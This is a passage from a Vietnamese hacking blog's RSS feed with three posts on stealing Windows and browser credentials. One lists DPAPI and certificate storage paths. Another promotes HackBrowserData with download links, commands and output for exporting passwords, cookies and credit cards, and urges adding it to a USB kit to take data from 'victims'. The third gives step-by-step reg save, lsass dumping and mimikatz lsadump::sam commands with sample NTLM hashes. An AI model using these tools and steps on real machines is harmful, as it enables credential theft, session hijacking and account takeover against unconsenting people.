<li><strong>%appdata%</strong> là <strong>C:\Users&lt;USERNAME&gt;\AppData\Roaming</strong></li>
<li><strong>{sid}</strong> là user SID</li>
</ul>
<p>System master keys:</p>
<ul>
<li>c:\Windows\System32\Microsoft\Protect*</li>
</ul>
<p>Chứng chỉ user:</p>
<ul>
<li>%APPDATA%\Microsoft\SystemCertificates\My\Certificates\</li>
<li>%APPDATA%\Microsoft\Crypto\RSA&lt;SID&gt;\</li>
</ul>
<p>Chứng chỉ hệ thống:</p>
<ul>
<li>HKLM:\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates*</li>
<li>C:\Programdata\Microsoft\Crypto\RSA\MachineKeys\</li>
</ul>
<p>Dropbox:</p>
<ul>
<li>HKCU\SOFTWARE\Dropbox\ks</li>
<li>HKCU\SOFTWARE\Dropbox\ks1</li>
<li>%APPDATA%\Local\Dropbox\instance1\config.dbx</li>
<li>%APPDATA%\Local\Dropbox\instance_db\instanse.dbx</li>
</ul>
<p>Rsa securid:</p>
<ul>
<li>%LOCALAPPDATA%\RSA\SecurIDStorage</li>
</ul>
<h2>Kết luận</h2>
<p>Bạn sẽ tìm thấy thêm thông tin trong tài liệu về các mô-đun và lệnh của <a href="https://github.com/gentilkiwi/mimikatz/wiki" target="_blank" rel="noopener">mimikatz. </a></p>
<h2>Câu hỏi thường gặp</h2>
<h3>Mimikatz là gì và nó hoạt động như thế nào?</h3>
<p>Mimikatz là một công cụ mạnh mẽ cho phép truy xuất mật khẩu và thông tin đăng nhập đã lưu trong hệ điều hành Windows. Nó hoạt động bằng cách khai thác các lỗ hổng bảo mật để truy cập vào bộ nhớ hệ thống và trích xuất dữ liệu nhạy cảm, bao gồm cả mật khẩu được lưu trữ bởi Credential Manager, trình duyệt web và các ứng dụng khác.</p>
<h3>DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu) là gì và vai trò của nó trong việc lưu trữ mật khẩu?</h3>
<p>DPAPI là một cơ chế mã hóa được tích hợp sẵn trong Windows, được sử dụng để bảo vệ dữ liệu nhạy cảm, bao gồm mật khẩu. Nó mã hóa dữ liệu bằng cách sử dụng các khóa chính được liên kết với tài khoản người dùng.  Để giải mã, cần có khóa chính tương ứng.</p>
<h3>Tôi có thể sử dụng Mimikatz để truy cập mật khẩu của người khác mà không cần sự cho phép không?</h3>
<p>Không.  Sử dụng Mimikatz để truy cập mật khẩu của người khác mà không có sự cho phép là bất hợp pháp và vi phạm đạo đức nghề nghiệp. Công cụ này chỉ nên được sử dụng cho mục đích nghiên cứu bảo mật hoặc với sự cho phép của chủ sở hữu hệ thống.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-hack-password-windows-da-luu-bang-mimikatz-va-dapa/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>HackBrowserData &#8211; Hack Password, Cookie, Bookmark trình duyệt Web</title>
		<link>https://anonyviet.com/hackbrowserdata-hack-password-cookie-credit-card-bookmark-lich-su-trinh-duyet/</link>
					<comments>https://anonyviet.com/hackbrowserdata-hack-password-cookie-credit-card-bookmark-lich-su-trinh-duyet/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 31 Dec 2020 08:53:05 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[hack chrome]]></category>
		<category><![CDATA[hack cookie]]></category>
		<category><![CDATA[hack mật khẩu trình duyệt]]></category>
		<category><![CDATA[hack pass chrome]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[hack password trình duyệt]]></category>
		<category><![CDATA[hack trình duyệt]]></category>
		<category><![CDATA[trình duyệt]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=24206</guid>

					<description><![CDATA[HackBrowserData là công cụ giúp bạn trích xuất tất cả thông tin của trình duyệt Web bao gồm: Password đã lưu, Cookie, Bookmark, History và cả Credit Card. Công cụ này hoạt động tốt trên tất cả trình duyệt thông dụng như Chrome, Firefox, Edge&#8230; và chạy được trên cả Windows, Linux, MACOS. Trình duyệt [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>HackBrowserData là công cụ giúp bạn trích xuất tất cả thông tin của trình duyệt Web bao gồm: Password đã lưu, Cookie, Bookmark, History và cả Credit Card. Công cụ này hoạt động tốt trên tất cả trình duyệt thông dụng như Chrome, Firefox, Edge&#8230; và chạy được trên cả Windows, Linux, MACOS.</strong></p>
<h2><strong>Trình duy</strong><strong>ệ</strong><strong>t có thể Hack được bằng HackBrowserData</strong></h2>
<p><strong>Windows</strong></p>
<table>
<thead>
<tr>
<td><strong>Browser</strong></td>
<td><strong>Password</strong></td>
<td><strong>Cookie</strong></td>
<td><strong>Bookmark</strong></td>
<td><strong>History</strong></td>
</tr>
</thead>
<tbody>
<tr>
<td>Google Chrome</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Google Chrome Beta</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">
<p style="text-align: left;">✓</p>
</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Firefox</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Microsoft Edge</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>360 Speed Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>QQ Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Brave Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Opera Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>OperaGX Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Vivaldi Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td style="text-align: left;">Internet Explorer</td>
<td>
<p style="text-align: center;">❌</p>
</td>
<td>
<p style="text-align: center;">❌</p>
</td>
<td>
<p style="text-align: center;">❌</p>
</td>
<td>
<p style="text-align: center;">❌</p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: left;"><strong>MacOS</strong></p>
<p>Do chính sách bảo mật của Apple, một số trình duyệt yêu cầu mật khẩu người dùng hiện tại để giải mã.</p>
<table>
<thead>
<tr>
<td><strong>Browser</strong></td>
<td><strong>Password</strong></td>
<td><strong>Cookie</strong></td>
<td><strong>Bookmark</strong></td>
<td><strong>History</strong></td>
</tr>
</thead>
<tbody>
<tr>
<td>Google Chrome</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Google Chrome Beta</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Firefox</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Microsoft Edge</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Brave Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Opera Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>OperaGX Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Vivaldi Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td style="text-align: center;">
<p style="text-align: left;">Safari</p>
</td>
<td style="text-align: center;">❌</td>
<td style="text-align: center;">❌</td>
<td style="text-align: center;">❌</td>
<td>
<p style="text-align: center;">❌</p>
</td>
</tr>
</tbody>
</table>
<p><strong>Linux</strong></p>
<table>
<thead>
<tr>
<td><strong>Browser</strong></td>
<td><strong>Password</strong></td>
<td><strong>Cookie</strong></td>
<td><strong>Bookmark</strong></td>
<td><strong>History</strong></td>
</tr>
</thead>
<tbody>
<tr>
<td>Google Chrome</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Google Chrome Beta</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Firefox</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Microsoft Edge Dev</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Brave Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Opera Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
<tr>
<td>Vivaldi Browser</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
<td style="text-align: center;">✓</td>
</tr>
</tbody>
</table>
<p><strong><span style="color: #1d1f20; font-size: 1.953em;">Cách sử dụng HackBrowserData</span></strong></p>
<p>Như một thói quen, nếu bạn đang dùng máy tính cá nhân sẽ thường lưu Password vào trình duyệt để tiện đăng nhập hoặc trong trường hợp bạn cho người khác sử dụng máy tính, bạn hoàn toàn có thể bị bí mật đánh cắp cookie và thông tin duyệt web mà không hề hay biết. Với HackBrowserData, chỉ cần 1 cú click, toàn bộ dữ liệu của bạn bao gồm: mật khẩu, lịch sử duyệt web, thẻ tín dụng, bookmark sẽ được xuất ra file và dễ dành đánh cắp.</p>
<p>Điểm nguy hiểm là <strong>HackBrowserData</strong> có thể Hack luôn cả Cookie của trình duyệt, giúp Hacker không cần Password vẫn có thể đăng nhập được cho dù bạn có bật xác minh 2 bước cho tài khoản.</p>
<p>Bạn có thể Download <strong>HackBrowserData đã được build sẵn cho từng hệ điều hành bằng link bên dưới:</strong></p>
<p style="text-align: center;"><span style="font-size: 18pt;"><strong><a href="https://drive.google.com/file/d/10UFIcsoF6QxBWsX6Qbg38jzj_NXvGXdI/view?usp=sharing" target="_blank" rel="noopener">Download </a></strong></span><span style="font-size: 18pt;"><strong>| </strong></span><span style="font-size: 18pt;"><strong><a href="http://www.fshare.vn/file/MROTUIONZRHX" target="_blank" rel="noopener">Backup</a></strong></span></p>
<p style="text-align: center;"><strong>(Password: anonyviet.com)</strong></p>
<p>Nếu bạn muốn hack trình duyệt trên Windows, thì giải nén ra chọn file <em>hack-browser-data-v0.3.2-windows-64bit.zip</em>, rồi giải nén tiếp. Có một file <strong>hack-browser-data.exe.</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/hack-browser-data-password.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/hack-browser-data-password.jpg" alt="Cách sử dụng HackBrowserData Hack Password Chrome" width="391" height="175" title="HackBrowserData - Hack Password, Cookie, Bookmark trình duyệt Web 28"></a></p>
<p>Chỉ cần<strong> kích hoạt file</strong> này lên, tất cả thông tin sẽ tự xuất ra file excel cho bạn, nội dung nằm trong thư mục <strong>results</strong>.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/results.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/results.jpg" alt="HackBrowserData Hack Password Firefox" width="601" height="268" title="HackBrowserData - Hack Password, Cookie, Bookmark trình duyệt Web 29"></a></p>
<p>Thử mở file <strong>chrome_cookie</strong> lên xem nào, èo tất cả cookie facebook, mail&#8230; trên trình duyệt đều được lưu vào đây.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/cookie-chrome-1.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/cookie-chrome-1.jpg" alt="HackBrowserData Hack Cookie Browser" width="742" height="210" title="HackBrowserData - Hack Password, Cookie, Bookmark trình duyệt Web 30"></a></p>
<p>Ngoài ra bạn có thể dùng CMD để kích hoạt <strong>hack-browser-data.exe và</strong> thêm 1 số tham số, nếu muốn Hack trình duyệt theo ý muốn. Ví dụ: chuyển thành file json, nén zip, chọn trình duyệt cần hack password&#8230;</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">C:\Users\AnonyViet\Desktop&gt;hack-browser-data.exe -h

NAME:
   hack-browser-data - Export passwords/cookies/history/bookmarks from browser

USAGE:
   [hack-browser-data -b chrome -f json -dir results -cc]
   Get all data(password/cookie/history/bookmark) from chrome

VERSION:
   0.3.2

GLOBAL OPTIONS:
   --verbose, --vv                     verbose (default: false)
   --compress, --cc                    compress result to zip (default: false)
   --browser value, -b value           available browsers: all|chrome-beta|edge|
brave|opera|opera-gx|chrome|qq|firefox|vivaldi|360 (default: "all")
   --results-dir value, --dir value    export dir (default: "results")
   --format value, -f value            format, csv|json|console (default: "csv")

   --profile-dir-path value, -p value  custom profile dir path, get with chrome:
//version
   --key-file-path value, -k value     custom key file path
   --help, -h                          show help (default: false)
   --version, -v                       print the version (default: false)</pre>
<pre><code>C:\Users\AnonyViet\Desktop&gt;hack-browser-data.exe -b all -f json --dir results -cc
[x]:  Get 44 cookies, filename is results/microsoft_edge_cookie.json
[x]:  Get 54 history, filename is results/microsoft_edge_history.json
[x]:  Get 1 passwords, filename is results/microsoft_edge_password.json
[x]:  Get 4 bookmarks, filename is results/microsoft_edge_bookmark.json
[x]:  Get 6 bookmarks, filename is results/360speed_bookmark.json
[x]:  Get 19 cookies, filename is results/360speed_cookie.json
[x]:  Get 18 history, filename is results/360speed_history.json
[x]:  Get 1 passwords, filename is results/360speed_password.json
[x]:  Get 12 history, filename is results/qq_history.json
[x]:  Get 1 passwords, filename is results/qq_password.json
[x]:  Get 12 bookmarks, filename is results/qq_bookmark.json
[x]:  Get 14 cookies, filename is results/qq_cookie.json
[x]:  Get 28 bookmarks, filename is results/firefox_bookmark.json
[x]:  Get 10 cookies, filename is results/firefox_cookie.json
[x]:  Get 33 history, filename is results/firefox_history.json
[x]:  Get 1 passwords, filename is results/firefox_password.json
[x]:  Get 1 passwords, filename is results/chrome_password.json
[x]:  Get 4 bookmarks, filename is results/chrome_bookmark.json
[x]:  Get 6 cookies, filename is results/chrome_cookie.json
[x]:  Get 6 history, filename is results/chrome_history.json
[x]:  Compress success, zip filename is results/archive.zip</code></pre>
<p>Chốt, bạn có thể thêm HackBrowserData vào bộ công cụ <a href="https://anonyviet.com/cach-tao-usb-hack-password-tren-may-tinh-nguoi-khac/" target="_blank" rel="noopener">USB Hack Password</a> mà AnonyViet đã hướng dẫn để có thể lấy thêm được nhiều thông tin từ victim.</p>
<p>Hiện mã nguồn của HackBrowserData có thể build cho từng loại hệ điều hành, bạn có thể thực hiện theo hướng dẫn của tác giả tại trang <a href="https://github.com/moonD4rk/HackBrowserData" target="_blank" rel="noopener">github</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>HackBrowserData hoạt động trên hệ điều hành nào?</h3>
<p>HackBrowserData hoạt động trên Windows, macOS và Linux.</p>
<h3>Những trình duyệt nào được hỗ trợ bởi HackBrowserData?</h3>
<p>HackBrowserData hỗ trợ hầu hết các trình duyệt phổ biến như Chrome, Firefox, Edge, Brave, Opera, Vivaldi.  Tuy nhiên, hỗ trợ có thể khác nhau tùy thuộc vào hệ điều hành và phiên bản trình duyệt.</p>
<h3>Tôi có thể trích xuất những thông tin gì từ trình duyệt bằng HackBrowserData?</h3>
<p>HackBrowserData có thể trích xuất mật khẩu đã lưu, cookie, bookmark, lịch sử duyệt web và cả thông tin thẻ tín dụng (nếu có lưu).</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/hackbrowserdata-hack-password-cookie-credit-card-bookmark-lich-su-trinh-duyet/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz</title>
		<link>https://anonyviet.com/hack-password-windows-bang-mimikatz/</link>
					<comments>https://anonyviet.com/hack-password-windows-bang-mimikatz/#comments</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Tue, 22 Dec 2020 02:47:13 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hack pass]]></category>
		<category><![CDATA[hack password]]></category>
		<category><![CDATA[hack password windows]]></category>
		<category><![CDATA[Mimikatz]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[password windows]]></category>
		<category><![CDATA[ram]]></category>
		<category><![CDATA[sam]]></category>
		<category><![CDATA[trích xuất RAM]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=23930</guid>

					<description><![CDATA[Trong bài viết này, chúng ta sẽ tìm hiểu nơi lưu trữ mật khẩu người dùng trong Windows, và cách trích xuất dữ liệu để Hack Password Windows từ bộ nhớ RAM. Ngoài ra bạn sẽ hiểu thêm cách hack mật khẩu người dùng và tìm hiểu xem tấn công Pass the hash là gì? [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Trong bài viết này, chúng ta sẽ tìm hiểu nơi lưu trữ mật khẩu người dùng trong Windows, và cách trích xuất dữ liệu để <a href="https://anonyviet.com/6-cong-cu-hack-password-windows-tot-nhat-hien-nay/">Hack Password Windows</a> từ bộ nhớ RAM. Ngoài ra bạn sẽ hiểu thêm cách hack mật khẩu người dùng và tìm hiểu xem tấn công Pass the hash là gì?</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/56.jpg" alt="Hack Password Windows 10" width="960" height="540" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 40"></p>
<p>Không phải ai cũng sử dụng mật khẩu trên Windows &#8211; đặc biệt hiếm khi người dùng đặt mật khẩu trên máy tính ở nhà. Nhưng trong công ty hoặc khi sử dụng Windows làm máy chủ, đặt mật khẩu là điều bắt buộc. Một thuộc tính thú vị khác của mật khẩu Windows là nếu người dùng có tài khoản Microsoft trực tuyến, chuỗi băm mật khẩu vẫn được lưu trữ trên máy tính cục bộ và mật khẩu được giải mã có thể được sử dụng để đăng nhập cho cả máy tính cục bộ và các dịch vụ trực tuyến của Microsoft.</p>
<h2>Windows lưu trữ mật khẩu đăng nhập của người dùng ở đâu?</h2>
<p>Mật khẩu người dùng Windows được lưu trữ trong Windows registry có tên là SYSTEM và SAM trong các tệp:</p>
<ul>
<li><strong>C:/Windows/System32/config/SAM</strong></li>
<li><strong>C:/Windows/System32/config/SYSTEM</strong></li>
</ul>
<p>Thay vì lưu trữ mật khẩu văn bản thuần túy, Windows lưu trữ mật khẩu theo mã băm. Những hàm băm này có thể bị brute-forced một cách dễ dàng. Nhưng ngay cả khi không bị bẻ khóa, hàm băm mật khẩu Windows vẫn có thể được sử dụng để thu thập dữ liệu và thực hiện các cuộc tấn công.</p>
<h2>Cách lấy mã băm mật khẩu Windows</h2>
<h3>Dump mã băm mật khẩu trên máy tính đang chạy</h3>
<p>Trên hệ thống đang chạy, bạn sẽ khá khó khăn trong việc truy cập các tệp <strong>C:/Windows/System32/config/SAM</strong> và <strong>C:/Windows/System32/config/SYSTEM</strong>, mặc dù điều này là có thể. Để lưu bản sao của những tệp này, bạn có thể sử dụng tiện ích <strong>reg</strong>:</p>
<div class="line number1 index0 alt2"><span style="font-size: 14pt;"><code class="bash plain">reg save HKLM\SYSTEM SystemBkup.hiv</code></span></div>
<div class="line number2 index1 alt1"><span style="font-size: 14pt;"><code class="bash plain">reg save HKLM\SAM SamBkup.hiv</code></span></div>
<p>Trong một số hướng dẫn, thay vì <strong>SYSTEM</strong>, <strong>SECURITY</strong> đã được lưu &#8211; đây là một sai lầm, bạn không thể khôi phục hàm băm với <strong>SECURITY</strong>  và <strong>SAM</strong>, chúng ta chỉ cần <strong>SYSTEM</strong> và <strong>SAM</strong>!</p>
<p>Mật khẩu băm cũng được chứa trong RAM, cụ thể là trong <strong>Local Security Authority Process</strong> (lsass.exe). Quá trình này luôn được khởi chạy trong Windows và bạn có thể kết xuất nó (một bản sao của quá trình trong RAM được lưu vào đĩa dưới dạng tệp). Bạn có thể sử dụng các tiện ích khác nhau để kết xuất, bao gồm hai tiện ích chính thức bên dưới:</p>
<ul>
<li><a href="https://miloserdov.org/?goto=35311" target="_blank" rel="noopener">Procdump</a></li>
<li>Task Manager</li>
</ul>
<p>Để mở Task Manager, hãy nhấn Win + r và nhập <strong>taskmgr</strong>, sau đó nhấn ENTER. Hoặc, nhấp chuột phải vào taskbar và chọn “<strong>Task Manager</strong>”.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/12/48.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 31" width="272" height="275" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 41"></p>
<p>Trong Task Manager, trong phần “<strong>Windows Processes</strong>”, nhấp chuột phải vào &#8220;<strong>Local Security Authority Process</strong>&#8220;và chọn “<strong>Create Dump File</strong>”.</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/12/49.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 32" width="550" height="471" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 42"></p>
<p>Tệp sẽ được lưu theo đường dẫn <strong>C:\Users\USERNAME\AppData\Local\Temp\lsass.DMP</strong>. Thay chỗ <strong>USERNAME </strong>bằng tên người dùng của bạn.</p>
<h2>Dump mã băm mật khẩu trên máy tính đã tắt</h2>
<p>Trên máy tính đã tắt, để lấy lại mật khẩu của người dùng sau này, bạn chỉ cần sao chép các tệp:</p>
<ul>
<li><strong>C:/Windows/System32/config/SAM</strong></li>
<li><strong>C:/Windows/System32/config/SYSTEM</strong></li>
</ul>
<p>Các tệp tương tự có thể được tìm thấy trong bản sao lưu Windows hoặc trong bản sao Shadow của đĩa hoặc bạn có thể sao chép nó bằng cách khởi động từ USB Live.</p>
<h2>Sự khác biệt giữa hàm băm NTLM và NTLMv1/v2 và Net-NTLMv1/v2</h2>
<p>Trên thực tế, NTLM và NTLMv1/v2 là những thứ khá khác nhau. Hàm băm NTLM được lưu trữ và sử dụng cục bộ và các hàm băm NTLMv1/NTLMv2 được sử dụng để xác thực mạng và được lấy từ hàm băm NTLM. Sử dụng bất kỳ hàm băm nào trên đây, bạn cũng có thể giải mã mật khẩu người dùng Windows, nhưng đây là các thuật toán mã hóa/bẻ khóa khác nhau.</p>
<p>Đối với Pass-the-hash, mình chỉ sử dụng hàm băm NTLM vì các hàm băm NTLMv1 / NTLMv2 không phù hợp.</p>
<p>Có một câu hỏi nữa là băm Net-NTLMv1 / v2 là gì. Hàm băm Net-NTLMv1/v2 là tên viết tắt của hàm băm NTLMv1/v2, tức là NTLMv1/v2 và Net-NTLMv1/v2 giống nhau. Còn NTLM thì khác.</p>
<p>Trong bài viết này, mình sẽ giải nén, bẻ khóa và khai thác mà không cần brute-force hàm băm <strong>NTLM</strong>.</p>
<h2>Mimikatz là gì?</h2>
<p>Mimikatz nổi tiếng với khả năng trích xuất mật khẩu ở dạng văn bản thuần túy (plain text), mã băm, mã PIN và kerberos từ RAM. Mimikatz cũng có thể thực hiện các cuộc tấn công pass-the-hash, pass-the-ticket hoặc xây dựng Golden tickets.</p>
<p>Đây là những cách triển khai mimikatz trong Meterpreter &amp; Metasploit, phản chiếu DLL trong PowerShell. Mimikatz có thể chạy trong Wine trên Linux, nhưng các chức năng liên quan đến trích xuất dữ liệu trực tiếp từ Windows sẽ không hoạt động; các chức năng để giải nén hàm băm từ kết xuất hoặc giải mã từ tệp đăng ký (registry files) vẫn sẽ hoạt động trên Linux.</p>
<h2>Cách cài đặt mimikatz trên Windows</h2>
<p>Mimikatz là một tiện ích dòng lệnh di động. Tức là, bạn không cần cài đặt nó.</p>
<p>1. Truy cập trang chủ của <a href="https://github.com/gentilkiwi/mimikatz/releases" target="_blank" rel="noopener">mimikatz</a>, tải xuống tệp <strong>mimikatz_trunk.7z</strong> hoặc <strong>mimikatz_trunk.zip</strong>. Và giải nén nó.</p>
<p>2. Mở PowerShell <strong>(Win + x → Windows PowerShell (administrator))</strong> hoặc command line <strong>(Win + r → cmd)</strong>.</p>
<p>3. Tại dấu nhắc lệnh, sử dụng lệnh cd để điều hướng đến thư mục có tệp <strong>mimikatz.exe</strong>. Ví dụ: tệp lưu trữ được giải nén vào thư mục <strong>C:\Users\MiAl\Downloads</strong>, vậy thì tệp chúng ta cần tìm sẽ nằm trong thư mục <strong>C:\Users\MiAl\Downloads\mimikatz_trunk\x64\:</strong></p>
<p><span style="font-size: 14pt;"><code class="bash functions">cd</code> <code class="bash plain">C:\Users\MiAl\Downloads\mimikatz_trunk\x64\</code></span></p>
<p>4. Chạy mimikatz:</p>
<p><span style="font-size: 14pt;"><code>.\mimikatz.exe</code></span></p>
<h2>Cách giải nén hàm băm mật khẩu người dùng NTLM từ các tệp registry</h2>
<p>Các lệnh sau phải được thực hiện trong bảng điều khiển mimikatz.</p>
<p>Lệnh <strong>log</strong> cho phép ghi tất cả đầu ra vào một FILE:</p>
<p><span style="font-size: 14pt;"><code>log FILE</code></span></p>
<p>Ví dụ: để ghi tất cả đầu ra vào tệp <strong>hash.txt</strong>:</p>
<p><span style="font-size: 14pt;"><code class="bash plain">log </code><code class="bash functions">hash</code><code class="bash plain">.txt</code></span></p>
<p>Mình đã sao chép các tệp <strong>SYSTEM</strong> và <strong>SAM</strong> từ máy tính đã tắt, bây giờ để giải nén hàm băm, mình cần chạy một lệnh có dạng:</p>
<p><span style="font-size: 14pt;"><code class="bash plain">lsadump::sam </code><code class="bash plain">/system</code><code class="bash plain">:C:\...\...\SYSTEM </code><code class="bash plain">/sam</code><code class="bash plain">:C:\...\...\SAM</code></span></p>
<p>Một ví dụ về lệnh của mình:</p>
<p><span style="font-size: 14pt;"><code class="bash plain">lsadump::sam </code><code class="bash plain">/system</code><code class="bash plain">:C:\Share-Server\files\SYSTEM </code><code class="bash plain">/sam</code><code class="bash plain">:C:\Share-Server\files\SAM</code></span></p>
<p>Kết quả:</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/12/50.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 33" width="536" height="686" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 43"> <img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/12/51.png" alt="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 34" width="540" height="692" title="Hack Password Windows bằng cách xuất dữ liệu từ RAM với Mimikatz 44"></p>
<p>Kết quả rất nhiều dữ liệu. Nhưng thứ chúng ta cần quan tâm là các dòng tuần tự có dạng:</p>
<ul>
<li>User: USERNAME</li>
<li>Hash NTLM: HASH</li>
</ul>
<p>Trong ví dụ trên, thì các dòng này có kết quả là:</p>
<ul>
<li>User: ShareOverlord</li>
<li>Hash NTLM: 7ce21f17c0aee7fb9ceba532d0546ad6</li>
<li>User: Alexey</li>
<li>Hash NTLM: ca76a176340f0291e1cc8ea7277fc571</li>
</ul>
<p>Ngoài ra còn có các dòng chứa tên người dùng:</p>
<ul>
<li>User: MiAl</li>
<li>User: Администратор</li>
</ul>
<p>Nhưng sau không có chuỗi nào với hàm băm NTLM, bởi vì những người dùng này không có mật khẩu trong hệ thống.</p>
<p>Nếu bạn muốn trích xuất dữ liệu từ các tệp registry của hệ điều hành hiện tại, hãy thoát mimikatz, bằng cách nhấn <strong>Ctrl + C</strong>.</p>
<p>Bây giờ chúng ta sẽ kết xuất tổ hợp registry <strong>SYSTEM</strong>  và <strong>SAM</strong> của hệ thống hiện tại:</p>
<p><code>reg save HKLM\SYSTEM SystemBkup.hiv</code></p>
<p><code>reg save HKLM\SAM SamBkup.hiv</code></p>
<p>Chạy lại mimikatz:</p>
<p><code>.\mimikatz.exe</code></p>
<p>Chạy log:</p>
<p><code>log hash-local.txt</code></p>
